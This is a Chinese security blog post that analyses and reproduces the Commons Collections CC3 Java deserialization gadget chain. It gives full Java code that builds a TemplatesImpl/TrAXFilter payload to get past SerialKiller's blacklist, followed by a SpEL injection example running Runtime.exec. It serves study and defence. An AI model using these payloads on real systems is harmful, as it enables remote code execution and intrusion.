CC3链分析与复现

概述

CC3主要是使用动态类加载,与CC1和CC6不同,CC1/6是Runtime命令执行,CC3是类加载,然后初始化调用静态代码块。TemplatesImpl加载类和初始化。
CommonsCollections3的⽬的很明显,就是为了绕过⼀些规则对InvokerTransformer的限制。
CommonsCollections3并没有使⽤到InvokerTransformer来调⽤任意方法,⽽是⽤到了另⼀个
类, com.sun.org.apache.xalan.internal.xsltc.trax.**TrAXFilte**

调用链分析

在这里插入图片描述

TemplatesImpl#newTransformer() -> 
  TemplatesImpl#getTransletInstance() ->
    TemplatesImpl#defineTransletClasses()->
      TransletClassLoader#defineClass()  (类加载)

在defineClass类加载完成以后,又继续运行defineTransletClasses类,会调用newInstance()进行实例化,触发静态代码块。

SerialKiller是⼀个Java反序列化过滤器,可以通过⿊名单与⽩名单的⽅式来限制反序列化时允许通过的类。它的黑名单中就存在InvokerTransformer类,因此CC3为了绕过黑名单,使用了com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter类,这个类的构造方法中调⽤了(TransformerImpl) templates.newTransformer(),免去了我们使用InvokerTransformer手工调用newTransformer()方法这一步。
在这里插入图片描述
这⾥会⽤到⼀个新的 Transformer,就是org.apache.commons.collections.functors.InstantiateTransformer。InstantiateTransformer也是⼀个实现了Transformer接⼝的类,他的作⽤就是调⽤构造⽅法。所以,我们实现的⽬标就是,利⽤ InstantiateTransformer 来调⽤到 TrAXFilter 的构造⽅法,再利⽤其构造⽅法⾥的 templates.newTransformer() 调⽤到 TemplatesImpl ⾥的字节码。避免了使用InvokerTransformer

完整代码

import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InstantiateTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;

import javax.xml.transform.Templates;
import java.io.*;
import java.lang.reflect.Field;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.util.HashMap;
import java.util.Map;

public class CC3TimplatesImpl {
    public static void main(String[] args) throws Exception {
        //TemplatesImpl中对加载的字节码是有一定要求的:
        //这个字节码对应的类必须是 com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet 的子类。
        byte[] data = Files.readAllBytes(Paths.get("E:\\code\\springboot-demo\\src\\main\\java\\com\\duziteng\\springbootdemo\\test\\classLoadTest\\RuntimeTemplatesImpl.class"));

        //TemplatesImpl内部类TransletClassLoader中有个方法defineClass来加载字节码
        //gadget: getOutputProperties -> newTransformer -> getTransletInstance -> defineTransletClasses -> defineClass
        TemplatesImpl obj = new TemplatesImpl();
        //设置变量的一些值来满足判断,保证代码能走到我们想要的位置
        setFieldValue(obj, "_bytecodes", new byte[][]{data}); // _bytecodes由字节码组成的数组
        setFieldValue(obj, "_name", "");//_name可以是任意字符串,只要不为null即可
        setFieldValue(obj, "_tfactory", new TransformerFactoryImpl());//_tfactory 需要是一个 TransformerFactoryImpl 对象,因为TemplatesImpl#defineTransletClasses() 方法里有调用到_tfactory.getExternalExtensionsMap() ,如果是null会出错。

//        obj.newTransformer();//getTransletInstance -> defineTransletClasses -> newInstance

        Transformer[] transformers = new Transformer[]{
                new ConstantTransformer(TrAXFilter.class),//TrAXFilter构造方法中接收一个transformer然后调用它的transformer方法
                //InstantiateTransformer用来实例化类,它的构造方法接收类的构造方法参数类型和参数值,transformer方法调用newInstance来实例化类
                new InstantiateTransformer(new Class[]{Templates.class}, new Object[]{obj})
        };

//        ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
        ChainedTransformer chainedTransformer = new ChainedTransformer(new ConstantTransformer[]{new ConstantTransformer(1)});
        HashMap<Object, Object> hashMap = new HashMap<>();
        Map decorate = LazyMap.decorate(hashMap, chainedTransformer);

        TiedMapEntry tiedMapEntry = new TiedMapEntry(decorate, "aa");
        HashMap<Object, Object> objectHashMap = new HashMap<>();
        objectHashMap.put(tiedMapEntry, "aa");

        decorate.clear();//清空,防止触发一次

        //替换ChainedTransformer为真实的Transformer
        Field iTransformers = ChainedTransformer.class.getDeclaredField("iTransformers");
        iTransformers.setAccessible(true);
        iTransformers.set(chainedTransformer, transformers);

        serialize(objectHashMap);
        unSerialize();

    }

    public static void serialize(Object obj) throws IOException {
        ObjectOutputStream objectOutputStream = new ObjectOutputStream(new FileOutputStream("D://ser2.bin"));
        objectOutputStream.writeObject(obj);
    }

    public static Object unSerialize() throws IOException, ClassNotFoundException {
        ObjectInputStream objectInputStream = new ObjectInputStream(new FileInputStream("D://ser2.bin"));
        return objectInputStream.readObject();
    }
    /**
     * setFieldValue()设置私有属性
     */
    public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception {
        Field field = obj.getClass().getDeclaredField(fieldName);
        field.setAccessible(true);
        field.set(obj, value);
    }
}
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
SpringBoot SpEL表达式注入漏洞是一种常见的安全漏洞,攻击者可以利用该漏洞在应用中执行恶意代码,从而导致应用被攻击。下面我将对该漏洞进行分析复现。 一、漏洞分析 SpringBoot中的SpEL(Spring Expression Language)是一种基于表达式的语言,用于在运行时动态地计算值或执行逻辑。SpEL表达式可以用于访问对象的属性、调用对象的方法、进行条件判断等操作。在SpringBoot中,SpEL表达式可以用于注解中的属性值、配置文件中的属性值等场景。 在SpEL表达式中,可以使用一些特殊的语法来引用Bean对象或调用Bean对象的方法。例如,可以使用`#{beanName.methodName()}`的语法来调用Bean对象的方法。如果在SpEL表达式中使用了未经过滤的用户输入,就会存在SpEL表达式注入漏洞。 攻击者可以通过构造恶意的SpEL表达式,将其注入到应用中,从而执行恶意代码。例如,可以将`#{T(java.lang.Runtime).getRuntime().exec('calc')}`注入到应用中,从而在受害者机器上执行计算器程序。 二、漏洞复现 下面我将通过一个简单的漏洞复现来说明SpEL表达式注入漏洞的危害性。 1. 创建一个SpringBoot应用 首先,我们需要创建一个SpringBoot应用。可以使用Spring Initializr来快速创建一个基本的SpringBoot应用。 2. 添加注解 在创建好的SpringBoot应用中,我们可以添加一个Controller类,并在其中添加一个RequestMapping注解。在RequestMapping注解中,我们可以使用SpEL表达式来引用Bean对象或调用Bean对象的方法。 ```java @RestController public class MyController { @RequestMapping("/test") public String test() { return "hello world"; } @RequestMapping(value = "/{name}", method = RequestMethod.GET) public String sayHello(@PathVariable("name") String name) { return "Hello " + name + "!"; } @RequestMapping(value = "/spel", method = RequestMethod.GET) public String spel() { String expression = "#{T(java.lang.Runtime).getRuntime().exec('calc')}"; ExpressionParser parser = new SpelExpressionParser(); Expression exp = parser.parseExpression(expression); return exp.getValue().toString(); } } ``` 在上述代码中,我们在/spel接口中使用了SpEL表达式来调用Runtime.getRuntime().exec方法,从而执行计算器程序。 3. 启动应用 启动应用后,访问/spel接口,可以看到计算器程序被成功执行。 4. 防范措施 为了防范SpEL表达式注入漏洞,我们可以采取以下措施: 1. 对用户输入进行过滤和验证,避免未经过滤的用户输入被注入到SpEL表达式中。 2. 尽量避免在注解或配置文件中使用SpEL表达式。 3. 对于必须使用SpEL表达式的场景,可以对SpEL表达式进行白名单过滤,只允许特定的SpEL表达式被执行。 4. 在应用中禁用动态表达式功能,避免SpEL表达式被执行。 5. 总结 SpEL表达式注入漏洞是一种常见的安全漏洞,攻击者可以利用该漏洞在应用中执行恶意代码。为了防范该漏洞,我们需要对用户输入进行过滤和验证,避免未经过滤的用户输入被注入到SpEL表达式中。同时,尽量避免在注解或配置文件中使用SpEL表达式,对于必须使用SpEL表达式的场景,可以对SpEL表达式进行白名单过滤,只允许特定的SpEL表达式被执行。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值